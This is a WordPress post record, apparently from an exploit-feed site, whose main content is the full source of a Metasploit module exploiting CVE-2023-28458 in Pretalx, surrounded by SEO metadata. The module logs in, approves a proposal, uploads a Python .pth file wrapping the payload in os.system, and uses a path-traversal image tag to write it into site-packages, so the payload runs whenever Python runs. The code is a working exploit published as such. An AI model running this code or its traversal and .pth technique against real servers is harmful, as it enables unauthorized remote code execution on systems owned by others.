{"id":15170,"date":"2025-08-29T17:44:58","date_gmt":"2025-08-29T17:44:58","guid":{"rendered":"http:\/\/localhost\/?p=15170"},"modified":"2025-08-29T17:44:58","modified_gmt":"2025-08-29T17:44:58","slug":"pretalx-limited-file-write-to-remote-code-execution","status":"publish","type":"post","link":"https:\/\/zero.redgem.net\/?p=15170","title":{"rendered":"Pretalx Limited File Write to Remote Code Execution_MSF:EXPLOIT-LINUX-HTTP-PRETALX_RCE_CVE_2023_28458-"},"content":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-08-29T19:54:41&#8243;,&#8221;description&#8221;:&#8221;This module exploits CVE-2023-28458, a limited file write in Pretalx, up to&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-08-28T18:53:51&#8243;,&#8221;modified&#8221;:&#8221;2025-08-29T18:53:34&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Pretalx Limited File Write to Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-LINUX-HTTP-PRETALX_RCE_CVE_2023_28458-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-28458&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current source: https:\/\/github.com\/rapid7\/metasploit-framework\\n##\\n\\nclass MetasploitModule \\u003c Msf::Exploit::Remote\\n  Rank = ExcellentRanking\\n\\n  include Msf::Exploit::Remote::HTTP::Pretalx\\n  prepend Msf::Exploit::Remote::AutoCheck\\n\\n  def initialize(info = {})\\n    super(\\n      update_info(\\n        info,\\n        &#8216;Name&#8217; =\\u003e &#8216;Pretalx Limited File Write to Remote Code Execution&#8217;,\\n        &#8216;Description&#8217; =\\u003e %q{\\n          This module exploits CVE-2023-28458, a limited file write in Pretalx, up to version 2.3.1. The module will use the vulnerability to write a malicious site-specific configuration hook forPython. Once hook is written, payload will be executed every time Pretalx user runs any Python code. Pretalx needs to run in debug mode to exploit this.\\n        },\\n        &#8216;License&#8217; =\\u003e MSF_LICENSE,\\n        &#8216;Author&#8217; =\\u003e [\\n          &#8216;Stefan Schiller&#8217;, # security researcher\\n          &#8216;msutovsky-r7&#8217; # module dev\\n        ],\\n        &#8216;References&#8217; =\\u003e [\\n          [ &#8216;URL&#8217;, &#8216;https:\/\/www.sonarsource.com\/blog\/pretalx-vulnerabilities-how-to-get-accepted-at-every-conference\/&#8217;],\\n          [ &#8216;CVE&#8217;, &#8216;2023-28458&#8217;]\\n        ],\\n        &#8216;Platform&#8217; =\\u003e [&#8216;unix&#8217;, &#8216;linux&#8217;],\\n        &#8216;Arch&#8217; =\\u003e ARCH_CMD,\\n        &#8216;Targets&#8217; =\\u003e [\\n\\n          [\\n            &#8216;Linux Target&#8217;,\\n            {\\n              &#8216;Arch&#8217; =\\u003e ARCH_CMD,\\n              &#8216;Platform&#8217; =\\u003e [&#8216;unix&#8217;, &#8216;linux&#8217;]\\n            }\\n          ]\\n        ],\\n        &#8216;DefaultOptions&#8217; =\\u003e { &#8216;WfsDelay&#8217; =\\u003e 60 * 5 },\\n        &#8216;DisclosureDate&#8217; =\\u003e &#8216;2023-03-07&#8217;,\\n        &#8216;DefaultTarget&#8217; =\\u003e 0,\\n\\n        &#8216;Notes&#8217; =\\u003e {\\n          &#8216;Stability&#8217; =\\u003e [CRASH_SAFE],\\n          &#8216;Reliability&#8217; =\\u003e [REPEATABLE_SESSION],\\n          &#8216;SideEffects&#8217; =\\u003e [ARTIFACTS_ON_DISK, IOC_IN_LOGS]\\n        }\\n      )\\n    )\\n\\n    register_options([\\n      OptString.new(&#8216;EMAIL&#8217;, [true, &#8216;User email to Pretalx backend&#8217;]),\\n      OptString.new(&#8216;PASSWORD&#8217;, [true, &#8216;Password to Pretalx backend&#8217;]),\\n\\n      OptString.new(&#8216;PYTHON_VERSION&#8217;, [true, &#8216;Python version running on target machine&#8217;, &#8216;python3.8&#8217;])\\n    ])\\n  end\\n\\n  def check\\n    return Exploit::CheckCode::Unknown, &#8216;Login failed, please check credentials&#8217; unless login(datastore[&#8216;EMAIL&#8217;], datastore[&#8216;PASSWORD&#8217;])\\n\\n    @logged_in = true\\n\\n    version_element = get_version\\n\\n    return Exploit::CheckCode::Safe(&#8216;Debug mode is not enabled&#8217;) unless debug?\\n\\n    return Exploit::CheckCode::Appears(\\&#8221;Detected vulnerable version #{version_element} and debug mode is enabled\\&#8221;) if version_element \\u003c= Rex::Version.new(&#8216;2.3.1&#8217;)\\n\\n    return Exploit::CheckCode::Safe(\\&#8221;Detected version #{version_element} is not vulnerable\\&#8221;)\\n  rescue UnexpectedResponseError\\n    return Exploit::CheckCode::Unknown(&#8216;Received unexpected response, check your options&#8217;)\\n  rescue VersionCheckError\\n    return Exploit::CheckCode::Detected(&#8216;Pretalx detected, failed to verify version&#8217;)\\n  rescue CsrfError\\n    return Exploit::CheckCode::Unknown(&#8216;Failed to get CSRF token&#8217;)\\n  rescue SessionCookieError\\n    return Exploit::CheckCode::Detected(&#8216;Pretalx detected, failed to get session cookie &#8211; check your credentials&#8217;)\\n  rescue DebugError\\n    return Exploit::Checkcode::Detected(&#8216;Failed to check if debug mode is enabled&#8217;)\\n  end\\n\\n  def exploit\\n    vprint_status(&#8216;Registering malicious speaker and proposal&#8217;)\\n\\n    proposal_info = {\\n      email: datastore[&#8216;EMAIL&#8217;],\\n      password: datastore[&#8216;PASSWORD&#8217;]\\n    }\\n\\n    registration_info = register_proposal(proposal_info)\\n    proposal_name = registration_info[:proposal_name]\\n\\n    vprint_status(\\&#8221;Logging with credentials: #{datastore[&#8216;EMAIL&#8217;]}\/#{datastore[&#8216;PASSWORD&#8217;]}\\&#8221;)\\n\\n    fail_with Failure::NoAccess, &#8216;Incorrect credentials&#8217; unless @logged_in || login(datastore[&#8216;EMAIL&#8217;], datastore[&#8216;PASSWORD&#8217;])\\n\\n    vprint_status(&#8216;Approving proposal&#8217;)\\n\\n    proposal_id = approve_proposal(proposal_name)\\n    vprint_status(&#8216;Uploading resource with payload&#8217;)\\n    resource_name = Rex::Text.rand_text_alphanumeric(5)\\n    resource_data = %(import os;os.system(\\&#8221;#{payload.encoded}\\&#8221;) )\\n    res = edit_proposal(Rex::Text.rand_text_alphanumeric(4), &#8221;, proposal_id, proposal_name, \\&#8221;#{resource_name}.pth\\&#8221;, resource_data)\\n\\n    fail_with Failure::PayloadFailed unless res.body =~ \/#{resource_name}_([a-zA-Z0-9]+)\\\\.pth\/\\n\\n    full_resource_name = \\&#8221;#{resource_name}_#{Regexp.last_match(1)}.pth\\&#8221;\\n\\n    vprint_status(&#8216;Inserts write primitve&#8217;)\\n\\n    write_primitive_description = \\&#8221;\\u003cimg src=&#8217;%2fmedia%2f#{datastore[&#8216;CONFERENCE_NAME&#8217;]}%2fsubmissions%2f#{proposal_id}%2fresources\/..\/..\/..\/..\/..\/tmp\/media%2f#{datastore[&#8216;CONFERENCE_NAME&#8217;]}\/..\/..\/..\/pretalx\/.local\/lib\/#{datastore[&#8216;PYTHON_VERSION&#8217;]}\/site-packages\/%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2f%2e%2e%2fmedia%2f#{datastore[&#8216;CONFERENCE_NAME&#8217;]}%2fsubmissions%2f#{proposal_id}%2fresources%2f#{full_resource_name}&#8217;\/\\u003e\\&#8221;\\n    edit_proposal(Rex::Text.rand_text_alphanumeric(4), write_primitive_description, proposal_id, proposal_name, &#8221;, &#8221;)\\n    vprint_status(&#8216;Adding proposal to schedule&#8217;)\\n    add_proposal_to_schedule(proposal_name)\\n    vprint_status(&#8216;Releasing schedule&#8217;)\\n    release_schedule\\n\\n    vprint_status(&#8216;Exporting schedule&#8217;)\\n    export_zip\\n    vprint_status(&#8216;Waiting for cron to run Python under Pretalx user&#8217;)\\n  end\\nend\\n&#8221;,&#8221;sourceHref&#8221;:&#8221;https:\/\/github.com\/rapid7\/metasploit-framework\/blob\/master\/modules\/exploits\/linux\/http\/pretalx_rce_cve_2023_28458.rb&#8221;,&#8221;cvss&#8221;:{&#8220;score&#8221;:4.3,&#8221;severity&#8221;:&#8221;MEDIUM&#8221;,&#8221;vector&#8221;:&#8221;CVSS:3.1\/AV:N\/AC:L\/PR:L\/UI:N\/S:U\/C:N\/I:L\/A:N&#8221;,&#8221;version&#8221;:&#8221;3.1&#8243;},&#8221;cvss2&#8243;:{},&#8221;cvss3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;,&#8221;cvssV3&#8243;:{&#8220;version&#8221;:&#8221;&#8221;,&#8221;vectorString&#8221;:&#8221;&#8221;,&#8221;baseScore&#8221;:0,&#8221;baseSeverity&#8221;:&#8221;&#8221;,&#8221;attackVector&#8221;:&#8221;&#8221;,&#8221;attackComplexity&#8221;:&#8221;&#8221;,&#8221;privilegesRequired&#8221;:&#8221;&#8221;,&#8221;userInteraction&#8221;:&#8221;&#8221;,&#8221;scope&#8221;:&#8221;&#8221;,&#8221;confidentialityImpact&#8221;:&#8221;&#8221;,&#8221;integrityImpact&#8221;:&#8221;&#8221;,&#8221;availabilityImpact&#8221;:&#8221;&#8221;}},&#8221;href&#8221;:&#8221;https:\/\/www.rapid7.com\/db\/modules\/exploit\/linux\/http\/pretalx_rce_cve_2023_28458\/&#8221;,&#8221;category_name&#8221;:&#8221;Exploit&#8221;,&#8221;post_link&#8221;:&#8221;&#8221;,&#8221;product&#8221;:&#8221;&#8221;,&#8221;version&#8221;:&#8221;&#8221;,&#8221;vendor&#8221;:&#8221;&#8221;,&#8221;ai_description&#8221;:&#8221;&#8221;,&#8221;ai_severity&#8221;:&#8221;&#8221;,&#8221;ai_vendor&#8221;:&#8221;&#8221;,&#8221;ai_product&#8221;:&#8221;&#8221;,&#8221;ai_version&#8221;:&#8221;&#8221;,&#8221;ai_score&#8221;:0}<\/p>\n","protected":false},"excerpt":{"rendered":"<p>{&#8220;lastseen&#8221;:&#8221;2025-08-29T19:54:41&#8243;,&#8221;description&#8221;:&#8221;This module exploits CVE-2023-28458, a limited file write in Pretalx, up to&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-08-28T18:53:51&#8243;,&#8221;modified&#8221;:&#8221;2025-08-29T18:53:34&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Pretalx Limited File Write to Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-LINUX-HTTP-PRETALX_RCE_CVE_2023_28458-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-28458&#8243;],&#8221;sourceData&#8221;:&#8221;##\\n# This module requires Metasploit: https:\/\/metasploit.com\/download\\n# Current&#8230;<\/p>\n","protected":false},"author":1,"featured_media":0,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"footnotes":""},"categories":[3],"tags":[6,8,123,12,21,169,13,7,11,5],"class_list":["post-15170","post","type-post","status-publish","format-standard","hentry","category-category_exploit","tag-cve","tag-cvss","tag-cvss-43","tag-exploit","tag-medium","tag-metasploit","tag-news","tag-security","tag-tapic","tag-vulnerability"],"yoast_head":"<!-- This site is optimized with the Yoast SEO plugin v27.5 - https:\/\/yoast.com\/product\/yoast-seo-wordpress\/ -->\n<title>Pretalx Limited File Write to Remote Code Execution_MSF:EXPLOIT-LINUX-HTTP-PRETALX_RCE_CVE_2023_28458- zero redgem<\/title>\n<meta name=\"robots\" content=\"index, follow, max-snippet:-1, max-image-preview:large, max-video-preview:-1\" \/>\n<link rel=\"canonical\" href=\"https:\/\/zero.redgem.net\/?p=15170\" \/>\n<meta property=\"og:locale\" content=\"en_US\" \/>\n<meta property=\"og:type\" content=\"article\" \/>\n<meta property=\"og:title\" content=\"Pretalx Limited File Write to Remote Code Execution_MSF:EXPLOIT-LINUX-HTTP-PRETALX_RCE_CVE_2023_28458- zero redgem\" \/>\n<meta property=\"og:description\" content=\"{&#8220;lastseen&#8221;:&#8221;2025-08-29T19:54:41&#8243;,&#8221;description&#8221;:&#8221;This module exploits CVE-2023-28458, a limited file write in Pretalx, up to&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-08-28T18:53:51&#8243;,&#8221;modified&#8221;:&#8221;2025-08-29T18:53:34&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Pretalx Limited File Write to Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-LINUX-HTTP-PRETALX_RCE_CVE_2023_28458-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-28458&#8243;],&#8221;sourceData&#8221;:&#8221;##n# This module requires Metasploit: https:\/\/metasploit.com\/downloadn# Current...\" \/>\n<meta property=\"og:url\" content=\"https:\/\/zero.redgem.net\/?p=15170\" \/>\n<meta property=\"og:site_name\" content=\"zero redgem\" \/>\n<meta property=\"article:published_time\" content=\"2025-08-29T17:44:58+00:00\" \/>\n<meta name=\"author\" content=\"invoker\" \/>\n<meta name=\"twitter:card\" content=\"summary_large_image\" \/>\n<meta name=\"twitter:label1\" content=\"Written by\" \/>\n\t<meta name=\"twitter:data1\" content=\"invoker\" \/>\n\t<meta name=\"twitter:label2\" content=\"Est. reading time\" \/>\n\t<meta name=\"twitter:data2\" content=\"4 minutes\" \/>\n<script type=\"application\/ld+json\" class=\"yoast-schema-graph\">{\"@context\":\"https:\\\/\\\/schema.org\",\"@graph\":[{\"@type\":\"Article\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15170#article\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15170\"},\"author\":{\"name\":\"invoker\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\"},\"headline\":\"Pretalx Limited File Write to Remote Code Execution_MSF:EXPLOIT-LINUX-HTTP-PRETALX_RCE_CVE_2023_28458-\",\"datePublished\":\"2025-08-29T17:44:58+00:00\",\"mainEntityOfPage\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15170\"},\"wordCount\":890,\"commentCount\":0,\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"keywords\":[\"CVE\",\"CVSS\",\"CVSS-4.3\",\"exploit\",\"MEDIUM\",\"metasploit\",\"news\",\"Security\",\"tapic\",\"Vulnerability\"],\"articleSection\":[\"category_exploit\"],\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"CommentAction\",\"name\":\"Comment\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=15170#respond\"]}]},{\"@type\":\"WebPage\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15170\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15170\",\"name\":\"Pretalx Limited File Write to Remote Code Execution_MSF:EXPLOIT-LINUX-HTTP-PRETALX_RCE_CVE_2023_28458- zero redgem\",\"isPartOf\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\"},\"datePublished\":\"2025-08-29T17:44:58+00:00\",\"breadcrumb\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15170#breadcrumb\"},\"inLanguage\":\"en-US\",\"potentialAction\":[{\"@type\":\"ReadAction\",\"target\":[\"https:\\\/\\\/zero.redgem.net\\\/?p=15170\"]}]},{\"@type\":\"BreadcrumbList\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/?p=15170#breadcrumb\",\"itemListElement\":[{\"@type\":\"ListItem\",\"position\":1,\"name\":\"Home\",\"item\":\"https:\\\/\\\/zero.redgem.net\\\/\"},{\"@type\":\"ListItem\",\"position\":2,\"name\":\"Pretalx Limited File Write to Remote Code Execution_MSF:EXPLOIT-LINUX-HTTP-PRETALX_RCE_CVE_2023_28458-\"}]},{\"@type\":\"WebSite\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#website\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"name\":\"zero redgem\",\"description\":\"\",\"publisher\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\"},\"potentialAction\":[{\"@type\":\"SearchAction\",\"target\":{\"@type\":\"EntryPoint\",\"urlTemplate\":\"https:\\\/\\\/zero.redgem.net\\\/?s={search_term_string}\"},\"query-input\":{\"@type\":\"PropertyValueSpecification\",\"valueRequired\":true,\"valueName\":\"search_term_string\"}}],\"inLanguage\":\"en-US\"},{\"@type\":\"Organization\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#organization\",\"name\":\"zero redgem\",\"url\":\"https:\\\/\\\/zero.redgem.net\\\/\",\"logo\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\",\"url\":\"\",\"contentUrl\":\"\",\"width\":191,\"height\":188,\"caption\":\"zero redgem\"},\"image\":{\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/logo\\\/image\\\/\"}},{\"@type\":\"Person\",\"@id\":\"https:\\\/\\\/zero.redgem.net\\\/#\\\/schema\\\/person\\\/fbfeae8dfad117ac08a7621bee1a1dca\",\"name\":\"invoker\",\"image\":{\"@type\":\"ImageObject\",\"inLanguage\":\"en-US\",\"@id\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"url\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"contentUrl\":\"https:\\\/\\\/secure.gravatar.com\\\/avatar\\\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g\",\"caption\":\"invoker\"},\"sameAs\":[\"https:\\\/\\\/zero.redgem.net\"],\"url\":\"https:\\\/\\\/zero.redgem.net\\\/?author=1\"}]}<\/script>\n<!-- \/ Yoast SEO plugin. -->","yoast_head_json":{"title":"Pretalx Limited File Write to Remote Code Execution_MSF:EXPLOIT-LINUX-HTTP-PRETALX_RCE_CVE_2023_28458- zero redgem","robots":{"index":"index","follow":"follow","max-snippet":"max-snippet:-1","max-image-preview":"max-image-preview:large","max-video-preview":"max-video-preview:-1"},"canonical":"https:\/\/zero.redgem.net\/?p=15170","og_locale":"en_US","og_type":"article","og_title":"Pretalx Limited File Write to Remote Code Execution_MSF:EXPLOIT-LINUX-HTTP-PRETALX_RCE_CVE_2023_28458- zero redgem","og_description":"{&#8220;lastseen&#8221;:&#8221;2025-08-29T19:54:41&#8243;,&#8221;description&#8221;:&#8221;This module exploits CVE-2023-28458, a limited file write in Pretalx, up to&#8230;&#8221;,&#8221;published&#8221;:&#8221;2025-08-28T18:53:51&#8243;,&#8221;modified&#8221;:&#8221;2025-08-29T18:53:34&#8243;,&#8221;type&#8221;:&#8221;metasploit&#8221;,&#8221;title&#8221;:&#8221;Pretalx Limited File Write to Remote Code Execution&#8221;,&#8221;source&#8221;:&#8221;&#8221;,&#8221;references&#8221;:&#8221;&#8221;,&#8221;id&#8221;:&#8221;MSF:EXPLOIT-LINUX-HTTP-PRETALX_RCE_CVE_2023_28458-&#8220;,&#8221;bulletinFamily&#8221;:&#8221;exploit&#8221;,&#8221;cwe&#8221;:null,&#8221;cvelist&#8221;:[&#8220;CVE-2023-28458&#8243;],&#8221;sourceData&#8221;:&#8221;##n# This module requires Metasploit: https:\/\/metasploit.com\/downloadn# Current...","og_url":"https:\/\/zero.redgem.net\/?p=15170","og_site_name":"zero redgem","article_published_time":"2025-08-29T17:44:58+00:00","author":"invoker","twitter_card":"summary_large_image","twitter_misc":{"Written by":"invoker","Est. reading time":"4 minutes"},"schema":{"@context":"https:\/\/schema.org","@graph":[{"@type":"Article","@id":"https:\/\/zero.redgem.net\/?p=15170#article","isPartOf":{"@id":"https:\/\/zero.redgem.net\/?p=15170"},"author":{"name":"invoker","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca"},"headline":"Pretalx Limited File Write to Remote Code Execution_MSF:EXPLOIT-LINUX-HTTP-PRETALX_RCE_CVE_2023_28458-","datePublished":"2025-08-29T17:44:58+00:00","mainEntityOfPage":{"@id":"https:\/\/zero.redgem.net\/?p=15170"},"wordCount":890,"commentCount":0,"publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"keywords":["CVE","CVSS","CVSS-4.3","exploit","MEDIUM","metasploit","news","Security","tapic","Vulnerability"],"articleSection":["category_exploit"],"inLanguage":"en-US","potentialAction":[{"@type":"CommentAction","name":"Comment","target":["https:\/\/zero.redgem.net\/?p=15170#respond"]}]},{"@type":"WebPage","@id":"https:\/\/zero.redgem.net\/?p=15170","url":"https:\/\/zero.redgem.net\/?p=15170","name":"Pretalx Limited File Write to Remote Code Execution_MSF:EXPLOIT-LINUX-HTTP-PRETALX_RCE_CVE_2023_28458- zero redgem","isPartOf":{"@id":"https:\/\/zero.redgem.net\/#website"},"datePublished":"2025-08-29T17:44:58+00:00","breadcrumb":{"@id":"https:\/\/zero.redgem.net\/?p=15170#breadcrumb"},"inLanguage":"en-US","potentialAction":[{"@type":"ReadAction","target":["https:\/\/zero.redgem.net\/?p=15170"]}]},{"@type":"BreadcrumbList","@id":"https:\/\/zero.redgem.net\/?p=15170#breadcrumb","itemListElement":[{"@type":"ListItem","position":1,"name":"Home","item":"https:\/\/zero.redgem.net\/"},{"@type":"ListItem","position":2,"name":"Pretalx Limited File Write to Remote Code Execution_MSF:EXPLOIT-LINUX-HTTP-PRETALX_RCE_CVE_2023_28458-"}]},{"@type":"WebSite","@id":"https:\/\/zero.redgem.net\/#website","url":"https:\/\/zero.redgem.net\/","name":"zero redgem","description":"","publisher":{"@id":"https:\/\/zero.redgem.net\/#organization"},"potentialAction":[{"@type":"SearchAction","target":{"@type":"EntryPoint","urlTemplate":"https:\/\/zero.redgem.net\/?s={search_term_string}"},"query-input":{"@type":"PropertyValueSpecification","valueRequired":true,"valueName":"search_term_string"}}],"inLanguage":"en-US"},{"@type":"Organization","@id":"https:\/\/zero.redgem.net\/#organization","name":"zero redgem","url":"https:\/\/zero.redgem.net\/","logo":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/","url":"","contentUrl":"","width":191,"height":188,"caption":"zero redgem"},"image":{"@id":"https:\/\/zero.redgem.net\/#\/schema\/logo\/image\/"}},{"@type":"Person","@id":"https:\/\/zero.redgem.net\/#\/schema\/person\/fbfeae8dfad117ac08a7621bee1a1dca","name":"invoker","image":{"@type":"ImageObject","inLanguage":"en-US","@id":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","url":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","contentUrl":"https:\/\/secure.gravatar.com\/avatar\/f17c01d7338e6932bcde121cf83569393df3374625d25afd62677cfb528f2e3e?s=96&d=mm&r=g","caption":"invoker"},"sameAs":["https:\/\/zero.redgem.net"],"url":"https:\/\/zero.redgem.net\/?author=1"}]}},"_links":{"self":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/15170","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=15170"}],"version-history":[{"count":0,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=\/wp\/v2\/posts\/15170\/revisions"}],"wp:attachment":[{"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=15170"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=15170"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/zero.redgem.net\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=15170"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}